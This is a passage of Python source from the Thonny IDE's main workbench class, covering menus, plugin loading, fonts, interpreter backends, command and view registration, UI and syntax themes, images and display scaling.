) # type: Union[tk.Menu, ui_utils.CustomMenubar]
if self.get_ui_mode() != "simple":
self._menubar.grid(row=0, sticky="nsew")
else:
opts = get_style_configuration("Menubar")
if "custom" in opts:
del opts["custom"]
self._menubar = tk.Menu(self, **opts)
if self.get_ui_mode() != "simple":
self["menu"] = self._menubar
self._menus = {} # type: Dict[str, tk.Menu]
self._menu_item_specs = (
{}
) # type: Dict[Tuple[str, str], MenuItem] # key is pair (menu_name, command_label)
# create standard menus in correct order
self.get_menu("file", _("File"))
self.get_menu("edit", _("Edit"))
self.get_menu("view", _("View"))
self.get_menu("run", _("Run"))
self.get_menu("tempdevice", _("Device"))
self.get_menu("tools", _("Tools"))
self.get_menu("help", _("Help"))
def _load_plugins(self) -> None:
# built-in plugins
import thonny.plugins # pylint: disable=redefined-outer-name
self._load_plugins_from_path(
thonny.plugins.__path__, "thonny.plugins." # type: ignore
)
# 3rd party plugins from namespace package
try:
import thonnycontrib # @UnresolvedImport
except ImportError:
# No 3rd party plugins installed
pass
else:
self._load_plugins_from_path(thonnycontrib.__path__, "thonnycontrib.")
def _load_plugins_from_path(self, path: List[str], prefix: str) -> None:
load_function_name = "load_plugin"
modules = []
for _, module_name, _ in sorted(pkgutil.iter_modules(path, prefix), key=lambda x: x[2]):
if module_name in OBSOLETE_PLUGINS:
logging.debug("Skipping plug-in %s", module_name)
else:
try:
m = importlib.import_module(module_name)
if hasattr(m, load_function_name):
modules.append(m)
except Exception:
logging.exception("Failed loading plugin '" + module_name + "'")
def module_sort_key(m):
return getattr(m, "load_order_key", m.__name__)
for m in sorted(modules, key=module_sort_key):
getattr(m, load_function_name)()
def _init_fonts(self) -> None:
# set up editor and shell fonts
self.set_default("view.io_font_family", "Courier" if running_on_mac_os() else "Courier New")
default_editor_family = "Courier New"
families = tk_font.families()
for family in ["Consolas", "Ubuntu Mono", "Menlo", "DejaVu Sans Mono"]:
if family in families:
default_editor_family = family
break
self.set_default("view.editor_font_family", default_editor_family)
if running_on_mac_os():
self.set_default("view.editor_font_size", 14)
self.set_default("view.io_font_size", 12)
elif self.in_simple_mode():
self.set_default("view.editor_font_size", 12)
self.set_default("view.io_font_size", 12)
else:
self.set_default("view.editor_font_size", 13)
self.set_default("view.io_font_size", 11)
default_font = tk_font.nametofont("TkDefaultFont")
if running_on_linux():
heading_font = tk_font.nametofont("TkHeadingFont")
heading_font.configure(weight="normal")
caption_font = tk_font.nametofont("TkCaptionFont")
caption_font.configure(weight="normal", size=default_font.cget("size"))
small_link_ratio = 0.8 if running_on_windows() else 0.7
self._fonts = [
tk_font.Font(
name="SmallLinkFont",
family=default_font.cget("family"),
size=int(default_font.cget("size") * small_link_ratio),
underline=True,
),
tk_font.Font(name="IOFont", family=self.get_option("view.io_font_family")),
tk_font.Font(
name="BoldIOFont", family=self.get_option("view.io_font_family"), weight="bold"
),
tk_font.Font(
name="UnderlineIOFont",
family=self.get_option("view.io_font_family"),
underline=True,
),
tk_font.Font(
name="ItalicIOFont", family=self.get_option("view.io_font_family"), slant="italic"
),
tk_font.Font(
name="BoldItalicIOFont",
family=self.get_option("view.io_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(name="EditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(name="SmallEditorFont", family=self.get_option("view.editor_font_family")),
tk_font.Font(
name="BoldEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
),
tk_font.Font(
name="ItalicEditorFont",
family=self.get_option("view.editor_font_family"),
slant="italic",
),
tk_font.Font(
name="BoldItalicEditorFont",
family=self.get_option("view.editor_font_family"),
weight="bold",
slant="italic",
),
tk_font.Font(
name="TreeviewFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
),
tk_font.Font(
name="BoldTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
weight="bold",
),
tk_font.Font(
name="ItalicTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
slant="italic",
),
tk_font.Font(
name="UnderlineTkDefaultFont",
family=default_font.cget("family"),
size=default_font.cget("size"),
underline=1,
),
]
self.update_fonts()
def _add_main_backends(self) -> None:
self.set_default("run.backend_name", "SameAsFrontend")
self.set_default("CustomInterpreter.used_paths", [])
self.set_default("CustomInterpreter.path", "")
self.add_backend(
"SameAsFrontend",
running.SameAsFrontendCPythonProxy,
_("The same interpreter which runs Thonny (default)"),
running.get_frontend_python(),
"1",
)
from thonny import running_config_page
self.add_backend(
"CustomCPython",
running.CustomCPythonProxy,
_("Alternative Python 3 interpreter or virtual environment"),
running_config_page.CustomCPythonConfigurationPage,
"2",
)
self.add_backend(
"PrivateVenv",
running.PrivateVenvCPythonProxy,
_("A special virtual environment (deprecated)"),
_("This virtual environment is automatically maintained by Thonny.\n")
+ _("Location: ")
+ running.get_private_venv_path(),
"z",
)
def _start_runner(self) -> None:
try:
self.update_idletasks() # allow UI to complete
thonny._runner = self._runner
self._runner.start()
self._update_toolbar()
except Exception:
self.report_exception("Error when initializing backend")
def _init_server_loop(self, server_socket) -> None:
"""Socket will listen requests from newer Thonny instances,
which try to delegate opening files to older instance"""
self._requests_from_socket = queue.Queue() # type: queue.Queue[bytes]
def server_loop():
while True:
logging.debug("Waiting for next client")
(client_socket, _) = server_socket.accept()
try:
self._handle_socket_request(client_socket)
except Exception:
traceback.print_exc()
Thread(target=server_loop, daemon=True).start()
self._poll_socket_requests()
def _init_commands(self) -> None:
self.add_command(
"exit",
"file",
_("Exit"),
self._on_close,
default_sequence=select_sequence("<Alt-F4>", "<Command-q>", "<Control-q>"),
extra_sequences=["<Alt-F4>"]
if running_on_linux()
else ["<Control-q>"]
if running_on_windows()
else [],
)
self.add_command("show_options", "tools", _("Options..."), self.show_options, group=180)
self.createcommand("::tk::mac::ShowPreferences", self.show_options)
self.createcommand("::tk::mac::Quit", self._mac_quit)
self.add_command(
"increase_font_size",
"view",
_("Increase font size"),
lambda: self._change_font_size(1),
default_sequence=select_sequence("<Control-plus>", "<Command-Shift-plus>"),
extra_sequences=["<Control-KP_Add>"],
group=60,
)
self.add_command(
"decrease_font_size",
"view",
_("Decrease font size"),
lambda: self._change_font_size(-1),
default_sequence=select_sequence("<Control-minus>", "<Command-minus>"),
extra_sequences=["<Control-KP_Subtract>"],
group=60,
)
self.bind("<Control-MouseWheel>", self._cmd_zoom_with_mouse, True)
self.add_command(
"focus_editor",
"view",
_("Focus editor"),
self._cmd_focus_editor,
default_sequence=select_sequence("<Alt-e>", "<Command-Alt-e>"),
group=70,
)
self.add_command(
"focus_shell",
"view",
_("Focus shell"),
self._cmd_focus_shell,
default_sequence=select_sequence("<Alt-s>", "<Command-Alt-s>"),
group=70,
)
if self.get_ui_mode() == "expert":
self.add_command(
"toggle_maximize_view",
"view",
_("Maximize view"),
self._cmd_toggle_maximize_view,
flag_name="view.maximize_view",
default_sequence=None,
group=80,
)
self.bind_class("TNotebook", "<Double-Button-1>", self._maximize_view, True)
self.bind("<Escape>", self._unmaximize_view, True)
self.add_command(
"toggle_maximize_view",
"view",
_("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
_("Change font size"),
caption=_("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
_("Exit Thonny"),
self._on_close,
image="quit",
caption=_("Quit"),
include_in_toolbar=True,
group=101,
)
if self.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
# Main frame functions as
# - a backgroud behind padding of main_pw, without this OS X leaves white border
# - a container to be hidden, when a view is maximized and restored when view is back home
main_frame = ttk.Frame(self) #
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=10, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=10, pady=10)
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1 # type: ignore
self._center_pw.insert("auto", self._editor_notebook)
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", ui_utils.get_default_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
If a menu with given name doesn't exist, then new menu is created
(with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
Groups with smaller numbers appear before.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logging.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
else:
_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
# I don't like that Tk menu toggles checbutton variable
# automatically before calling the handler.
# So I revert the toggle before calling the actual handler.
# This way the handler doesn't have to worry whether it
# needs to toggle the variable or not, and it can choose to
# decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
# no image or black next to a checkbox
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
view_class: Class or constructor for view. Should be callable with single
argument (the master of the view)
label: Label of the view tab
location: Location descriptor. Can be "nw", "sw", "s", "se", "ne"
Returns: None
"""
view_id = cls.__name__
if default_position_key == None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
# assing names to related classes
proxy_class.backend_name = name # type: ignore
if not isinstance(config_page_constructor, str):
if not getattr(config_page_constructor, "backend_name", None):
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(_("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(_("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, ie. when theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
preferred_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if preferred_theme in available_themes:
self._apply_ui_theme(preferred_theme)
elif "Enhanced Clam" in available_themes:
self._apply_ui_theme("Enhanced Clam")
elif "Windows" in available_themes:
self._apply_ui_theme("Windows")
self._apply_syntax_theme(self.get_option("view.syntax_theme"))
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
name, _, _ = self._ui_themes[name]
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=_("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
_("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=_("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor="hand2",
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
_("Regular mode"),
_(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
parent=self,
)
label.bind("<1>", on_click, True)
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
If the name contains a period, then the part left to the (first) period
will become the section of the option and rest will become name under that
section.
If the name doesn't contain a period, then it will be added under section
"general".
"""
self._configuration_manager.set_default(name, default_value)
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
name: meant to be used as not translatable menu name
label: translated label, used only when menu with given name doesn't exist yet
"""
if name not in self._menus:
menu = tk.Menu(self._menubar, **get_style_configuration("Menu"))
menu["postcommand"] = lambda: self._update_menu(menu, name)
self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
# initially the view will be in it's home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(self, filename: str, tk_name: Optional[str] = None) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
if self._scaling_factor >= 2.0:
scaled_filename = filename[:-4] + "_2x.png"
if os.path.exists(scaled_filename):
filename = scaled_filename
else:
img = tk.PhotoImage(file=filename)
# can't use zoom method, because this doesn't allow name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
int(self._scaling_factor),
int(self._scaling_factor),
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView') """
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto",
view.home_widget, # type: ignore
text=self._view_records[view_id]["label"],
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return None
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
# pylint: disable=signature-differs
if not add:
logging.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
def unbind(self, sequence: str, func=None) -> None:
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logging.getLogger("thonny").exception(
"Can't remove binding for '%s' and '%s'", sequence, func
)
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return os.environ.get("THONNY_DEBUG", False) in [
"1",
1,
"True",
True,
"true",
] or self.get_option("general.debug_mode", False)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
# it may be infinity in eg. Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
